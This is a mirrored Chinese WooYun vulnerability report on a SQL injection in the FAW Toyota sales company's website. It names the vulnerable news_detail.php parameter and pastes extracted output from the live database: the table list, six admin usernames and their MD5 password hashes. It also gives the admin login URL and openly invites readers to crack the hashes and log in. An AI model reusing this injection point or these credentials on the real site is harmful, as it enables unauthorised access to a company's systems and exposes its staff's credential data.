乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-09-06: 厂商已经主动忽略漏洞,细节向公众公开
一汽丰田汽车销售有限公司(FTMS)SQL注射一枚
注射点http://www.ftms.com.cn/information/news_detail.php?id=82
dealer库里表段太多截图不下,直接贴在code里吧
Database: dealer[87 tables]+----------------------+| actions || adminmanage || carfield || carinfo || cars || cartype || color_cars || colors || members || news || news_cartype || newstype || recom || setting || siteinfo || t_ad || t_ad1111 || t_admin || t_article || t_article11111 || t_car || t_cars || t_cars1111 || t_cou_50_ip_hits || t_cou_50_ip_limit || t_cou_adv || t_cou_alexa || t_cou_area || t_cou_bot || t_cou_browser || t_cou_city || t_cou_color || t_cou_country || t_cou_day_data || t_cou_holiday || t_cou_keyword || t_cou_language || t_cou_month_data || t_cou_page || t_cou_pagead || t_cou_pagedepth || t_cou_pageentry || t_cou_plug || t_cou_province || t_cou_referer || t_cou_returner || t_cou_screen || t_cou_similar || t_cou_site || t_cou_system || t_cou_timelong || t_cou_timezone || t_cou_user_site || t_cou_users || t_cou_year_data || t_dealer || t_dealer1111 || t_dealer1112 || t_dealer_1108 || t_dealer_1109 || t_dealer_1115 || t_dealer_1116 || t_dealer_bak20120914 || t_gbook || t_job || t_link || t_new_cars || t_new_class || t_new_event || t_new_focus || t_new_items || t_new_message || t_new_news || t_new_newsclass || t_new_reserve || t_new_testdrive || t_notice || t_photo || t_photo1111 || t_province_city || t_refinement || t_sessions || t_sort || t_sort_bak || t_sort_rename || t_user || t_way |+----------------------+
这里我们选择t_admin这个表来run
下面是管理用户名
Database: dealerTable: t_admin[6 entries]+----------+| username |+----------+| geniusyt || r || ring || sring || ssff || toyota |+----------+
加密后的密码,屌丝还是那个问题,木钱解付费的。。。只能到此为止,但是有小富婆来渗透的话,这临门一脚就踹进去了
特此贴出让我无语的加密密码
Database: dealerTable: t_admin[6 entries]+----------------------------------+| psw |+----------------------------------+| 0c805f9b3a3a55c637612616e22e41c1 || 0f890f48e3922999c7b364eef3df6615 || 132cd3b981019b59dc42653eea0b34b4 || 484965bbd038138b30664359f1163f04 || 6e14a1b7b419878ef8a308f30dbbe1bf || b229fbfe4c64d1d070511e1150d5e62e |+----------------------------------+
后台登录地址http://www.ftms.com.cn/admin/login.php
综上
你们懂
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)